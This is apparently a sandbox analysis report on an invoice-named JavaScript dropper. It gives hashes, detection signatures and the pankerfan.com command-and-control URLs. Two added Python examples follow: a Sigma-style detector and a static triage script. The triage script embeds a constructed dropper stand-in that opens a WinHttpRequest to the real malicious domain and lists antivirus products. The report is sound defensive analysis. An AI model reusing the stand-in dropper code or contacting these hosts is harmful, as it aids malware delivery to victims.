Windows Analysis Report
Invoice_949287 2024_4_81859153_8337611.js

Overview

General Information

Sample name: Invoice_949287 2024_4_81859153_8337611.js
Analysis ID: 1428530
MD5: dc6731d9395eca15bbb79a88e98ad790
SHA1: cfa27b8f65a0d2e1453968d85111ce408dda4e32
SHA256: 551f30891cadc3826ea24c817d6bb95018006afc375c644a363e50074fe5c6a3

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
JavaScript file contains Antivirus product strings
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
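The two Sigma hits in this list fire on process-creation telemetry rather than on the file itself. The script below is an added example (not part of the sandbox report and not the Sigma project's rule text) that approximates what those two rules check, run over constructed Sysmon-style process-creation events: field names follow the Sigma process_creation convention, the extension and path lists are an approximation of the public rules rather than a copy, and the first event models the launch seen in this report (wscript.exe opening the .js from a user-writable path).

```python
"""Process-creation detection for WSH script execution, approximating the two
Sigma rules the report matched: "WSF/JSE/JS/VBA/VBE File Execution Via
Cscript/Wscript" and "WScript or CScript Dropper".

Added example: not part of the sandbox report and not the Sigma rule text.
Field names follow Sysmon Event ID 1 / Sigma process_creation conventions;
the extension and path lists approximate the public rules; EVENTS is
constructed for this example.
"""

WSH_HOSTS = ("\\wscript.exe", "\\cscript.exe")
# Extensions the "script exec" rule looks for anywhere in the command line.
SCRIPT_EXTS = (".js", ".jse", ".vba", ".vbe", ".wsf")
# The "dropper" rule combines an extension list with user-writable locations;
# .vbs is included here and not above, mirroring that the two rules differ.
DROPPER_EXTS = (".js", ".jse", ".vba", ".vbe", ".vbs")
USER_WRITABLE = (":\\users\\", ":\\programdata\\")


def _is_wsh_host(event):
    return event.get("Image", "").lower().endswith(WSH_HOSTS)


def script_exec_via_wsh(event):
    """Medium severity: wscript/cscript launched with a script of an interesting
    extension. Substring matching is deliberately loose, like Sigma's
    'contains' modifier, so '.js' also trips on '.jse' and on '.json'."""
    cmd = event.get("CommandLine", "").lower()
    return _is_wsh_host(event) and any(ext in cmd for ext in SCRIPT_EXTS)


def wsh_dropper(event):
    """High severity: the script lives under a user-writable location, the
    pattern of mail-delivered droppers such as the sample in this report."""
    cmd = event.get("CommandLine", "").lower()
    return (_is_wsh_host(event)
            and any(p in cmd for p in USER_WRITABLE)
            and any(ext in cmd for ext in DROPPER_EXTS))


def evaluate(events):
    """Return (event index, rule name, severity) for every match."""
    hits = []
    for i, ev in enumerate(events):
        if wsh_dropper(ev):
            hits.append((i, "WScript or CScript Dropper", "high"))
        if script_exec_via_wsh(ev):
            hits.append((i, "WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript", "medium"))
    return hits


# Constructed events (not real telemetry).
EVENTS = [
    {   # the sample's launch, as a user opening the attachment would produce it
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Downloads\Invoice_949287 2024_4_81859153_8337611.js"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # routine admin use of a script shipped with Windows: no alert expected
        "Image": r"C:\Windows\System32\cscript.exe",
        "CommandLine": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # an Office child process running a .jse from ProgramData
        "Image": r"C:\Windows\SysWOW64\wscript.exe",
        "CommandLine": r"wscript.exe //B C:\ProgramData\svc\update.jse",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {   # unrelated process
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\Users\user\script.ps1",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for idx, rule, sev in evaluate(EVENTS):
        print(f"[{sev}] event {idx}: {rule}")
```

The slmgr.vbs event is the case worth keeping in mind when tuning: it is a legitimate WSH launch, and the only thing that separates it from the dropper is the script's location, which is why the high-severity rule keys on the path rather than on the host binary.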

AV Detection

Source: pankerfan.com Virustotal: Detection: 9%
Source: https://pankerfan.com/ Virustotal: Detection: 7%
Source: unknown DNS traffic detected: query: pankerfan.com reply code: Server failure (2)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: pankerfan.com
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=583181
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://github.com/pmjoniak/GeometricTools/blob/master/GTEngine/Include/Mathematics/GteIntrRay3Trian
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://media.blackhat.com/us-13/US-13-Daigniere-TLS-Secrets-Slides.pdf
Source: wscript.exe, 00000000.00000003.2034679979.00000200A66AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A66AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/
Source: wscript.exe, 00000000.00000003.2034679979.00000200A66AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A66AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/2u
Source: wscript.exe, 00000000.00000003.2034679979.00000200A66AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A66AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/:u
Source: wscript.exe, 00000000.00000003.2035036189.00000200A68E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/eft-edi-customer?Xe=wawxGFZa&Ys=ecIFw&sourceNB=qdE
Source: wscript.exe, 00000000.00000003.2034236548.00000200A66C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035673999.00000200A66F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/eft-edi-customer?Xe=wawxGFZa&Ys=ecIFw&sourceNB=qdENHf&jjcontent=mIBXU&l_cid=82
Source: wscript.exe, 00000000.00000003.2034770728.00000200A6687000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A6688000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com:443/eft-edi-customer?Xe=wawxGFZa&Ys=ecIFw&sourceNB=qdENHf&jjcontent=mIBXU&l_ci
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/26114
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://wiki.mozilla.org/Security/Tor_Uplift/Tracking
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://www.mozilla.org/en-US/firefox/39.0/releasenotes/
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://www.ppsloan.org/publications/StupidSH36.pdf

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
Source: Invoice_949287 2024_4_81859153_8337611.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal60.evad.winJS@1/0@1/0
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Invoice_949287 2024_4_81859153_8337611.js Static file information: File size 5728041 > 1048576
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe TID: 6432 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 1976 Thread sleep time: -30000s >= -30000s
Source: Invoice_949287 2024_4_81859153_8337611.js Binary or memory string: UireBlWC += 'hkNv7vw5f';/*e assessment on the computer (e.g., 41 43 9 45 INTEGER(KIND=MPI_OFFSET_KIND) OFFSET 26 46 40 where extent(recvtype) is the type extent obtained from a call to MPI_Type_get_extent. int MPI_File_get_position(MPI_File fh, MPI_Offset -offset) of a window created with regions and countries. control variables, since performance variables have different requirements and parameters. By keeping them separate, the interface provides cleaner semantics and allows extreme events (very high confidence), and loss of livelihoods and culture (high confidence) (Figure 2.3). e-commerce, both at a domestic and international level. The TYPE(MPI_Request) :: req(4) 32 TYPE(MPI_Comm), INTENT(IN) :: comm In Germany, the national virtual machine was run on the VMware Player. As mentioned 31 . regarding the quality of these reviews with regard to the professional standards 1 after the broadcast, and process 2 sends a message to process 1 before the broadcast. - create the complex-product user-op MPI_COMBINER_RESIZED, 117, 123, 679 RELIGIONc pointer, disp_unit, and size of the memory segment belonging the lowest rank that specified conduct outreach activities, report those activities here. Note that scientific publications and the sharing 1. An MPI subroutine with a choice argument may be called with different argument 22 POLICIES AND REGULATION: Interstate kinetic conflictsdefined as direct 28 Pass 22 Informant interview _faglighedSkaerpet_tilsyn_med_videreSkaerpet_ti cognitive impairment (and decline from a previous must be completed with an end routine before it is safe to free buffers, etc. 
37 precipitation, the evidence is mostly drawn from changes in indices based on one-day or five-day precipitation amounts and the root executes n receives, 25 - 17 OUT recvbuf starting address of receive buffer (choice) arguments used in the MPI_BSEND call, returns an upper bound on the amount climate-informed transboundary management, cooperation, responses and solutions through multinational or regional governance processes (high confidence). Multilateral governance efforts can help biodiversity and the financial impacts, we can expect t 22 to the data presented in the paper) either weighted Chapter 6 40 World Religion Database. 5 computer-based items via a preview function, to ensure that the stimulus, questions, and Diff erences in profi ciency levels may indicate that fi eldwork eff orts to gain late respondent participation were eff ective in reducing nonresponse bias. At the same time, they indicate that some level of nonresponse bias might still be present in the data. However, this high income countries, US$1.4 billion from middle Documentation 16 4 5.5.1 Performance of European healthcare systems process whose rank in comm is equal to root. The value of these arguments on other scores on the new Mental Health indicators. 3 Interview from our 2010 estimate of 1.01%. Excluding informal It see*/
Source: Invoice_949287 2024_4_81859153_8337611.js Binary or memory string: /*ocesses with compare the basis for prevalence estimates (WAR 2009 vs monopoly on power and control over society NORTH AFRICA 12 37 more volatile and confrontational geopolitical MPI_INFO_SET, 366, 366, 367, 369 5 have decided not to enforce any restrictions on the author of the MPI library that would 12 2 target_count, target_datatype, op, win) most likely will be accelerated by convergent 41 the VMware VIX interface soft ware. Th is soft ware provided services such as controlling virtual machines, fi le handling, and calling programs and scripts inside the virtual machine. 15 buffers can be from the beginning of a nonblocking operation until the completion INTEGER COMM_OLD, N, SOURCES(-), DEGREES(-), DESTINATIONS(-), 19 tag, newintercomm, ierror) 20 Advance Estimates of U.S. Retail and Food Services 42 If the Fortran compiler provides TYPE(C_PTR), then the following generic interface must during the fi rst six weeks of main working phase 1. Interviewers could request one of four modified by prefixing with the letter P, e.g., PMPI_Isend. The specific procedure names int MPI_Error_string(int errorcode, char -string, int -resultlen) OPE included catering to regional variations in language or diff erences in vocabulary use in different age groups. Bey*/
Source: wscript.exe, 00000000.00000003.2034679979.00000200A66AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A66AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;;|

HIPS / PFW / Operating System Protection Evasion

Source: Invoice_949287 2024_4_81859153_8337611.js Initial file: avast, norton, drweb, eset, avg
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
No contacted IP infos
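The System Summary entries (strings longer than 50 characters, a 5.7 MB file, the junk-prose comment blocks shown in the binary strings, the WinHttpRequest COM query) and the HIPS entry listing antivirus product names in the initial file are all things a static triage pass can reproduce before the sample is ever run. The script below is an added example (not part of the sandbox report and not the sample's own code) that does that on a constructed stand-in for the dropper. What is assumed rather than taken from the report: the real file shows the pankerfan.com URL only in wscript.exe memory, so it is presumably assembled at run time, whereas the constructed SAMPLE writes it in clear to keep the example short and offline; the WinHttp.WinHttpRequest.5.1 ProgID is the registered name of the CLSID the report shows being queried; the 30-second WScript.Sleep is one way to produce the sleep the sandbox recorded, not something the report proves.

```python
"""Static triage for a comment-padded WSH JavaScript dropper.

Added example: not part of the sandbox report and not the sample's own code.
It reproduces, offline, the file-level observations the report makes about
the sample (block comments stuffed with unrelated text to inflate the file,
string literals longer than 50 characters, antivirus product names, and the
WinHttpRequest / sleep indicators) on a constructed stand-in, SAMPLE.
"""
import hashlib
import re

# Constructed stand-in for the dropper. It mimics the pattern visible in the
# report: one statement of real code, then a /* ... */ comment of unrelated
# prose. Assumptions, not facts from the report: the C2 URL and the
# WinHttp.WinHttpRequest.5.1 ProgID are written in clear, and a 30-second
# WScript.Sleep stands in for whatever produced the recorded sleep. The long
# literal is base64 of the ASCII alphabet, standing in for an encoded stage.
SAMPLE = r"""
var UireBlWC = '';
UireBlWC += 'hkNv7vw5f';/*e assessment on the computer (e.g., 41 43 9 45 INTEGER(KIND=MPI_OFFSET_KIND) OFFSET 26 46 40 where extent(recvtype) is the type extent obtained from a call to MPI_Type_get_extent. https://www.mozilla.org/en-US/firefox/39.0/releasenotes/ extreme events (very high confidence), and loss of livelihoods and culture (high confidence) (Figure 2.3). e-commerce, both at a domestic and international level. In Germany, the national virtual machine was run on the VMware Player.*/
UireBlWC += 'QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2';/*ocesses with compare the basis for prevalence estimates (WAR 2009 vs monopoly on power and control over society NORTH AFRICA 12 37 more volatile and confrontational geopolitical*/
var avList = ['avast', 'norton', 'drweb', 'eset', 'avg'];
var req = new ActiveXObject('WinHttp.WinHttpRequest.5.1');
req.Open('GET', 'https://pankerfan.com/eft-edi-customer?Xe=wawxGFZa&Ys=ecIFw&sourceNB=qdE', false);
WScript.Sleep(30000);
"""

BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Single- or double-quoted JS string literal, honouring backslash escapes.
STRING_LITERAL = re.compile(r"'(?:[^'\\\n]|\\.)*'|\"(?:[^\"\\\n]|\\.)*\"")
URL = re.compile(r"https?://[^\s'\"<>]+")
AV_PRODUCTS = ("avast", "avg", "avira", "bitdefender", "drweb", "eset",
               "kaspersky", "mcafee", "norton", "sophos", "symantec",
               "windows defender")
# ProgIDs and calls that matter in a WSH dropper: HTTP fetch, shell, file
# system, binary stream writing, and sleeping.
WSH_INDICATORS = ("ActiveXObject", "WinHttp.WinHttpRequest", "MSXML2.XMLHTTP",
                  "WScript.Shell", "Scripting.FileSystemObject", "ADODB.Stream",
                  "WScript.Sleep")


def strip_block_comments(src):
    """Remove /* ... */ comments. Naive on purpose: a '/*' inside a string
    literal would be taken as a comment start, which is fine for triage but
    not for a faithful deobfuscation."""
    return BLOCK_COMMENT.sub("", src)


def long_string_literals(src, min_len=50):
    """Contents of string literals at least min_len characters long, the
    'very long strings' heuristic from the report (threshold 50)."""
    return [m.group(0)[1:-1] for m in STRING_LITERAL.finditer(src)
            if len(m.group(0)) - 2 >= min_len]


def av_product_strings(src):
    """Antivirus product names present as whole words (case-insensitive)."""
    low = src.lower()
    return [p for p in AV_PRODUCTS if re.search(r"\b" + re.escape(p) + r"\b", low)]


def extract_urls(src):
    """Unique URLs in order of first appearance."""
    seen, out = set(), []
    for u in URL.findall(src):
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out


def wsh_indicators(src):
    return [i for i in WSH_INDICATORS if i in src]


def triage(src):
    """Run every check on the de-padded code and report URLs separately for
    code and for comment padding: in a file like this one, URLs inside the
    padding are noise from whatever text was pasted in, not infrastructure."""
    code = strip_block_comments(src)
    comments = " ".join(BLOCK_COMMENT.findall(src))
    return {
        "sha256": hashlib.sha256(src.encode()).hexdigest(),
        "size": len(src),
        "code_size": len(code),
        "comment_padding_ratio": round(1 - len(code) / len(src), 3) if src else 0.0,
        "long_strings": long_string_literals(code),
        "av_products": av_product_strings(code),
        "urls_in_code": extract_urls(code),
        "urls_in_comments": extract_urls(comments),
        "wsh_indicators": wsh_indicators(code),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

On the real 5.7 MB file the padding ratio is what makes the sample look bulky to size-based filters, and splitting URLs by code versus comment is what separates the pankerfan.com infrastructure from the mozilla.org, github.com and torproject.org strings the sandbox also pulled out of the file.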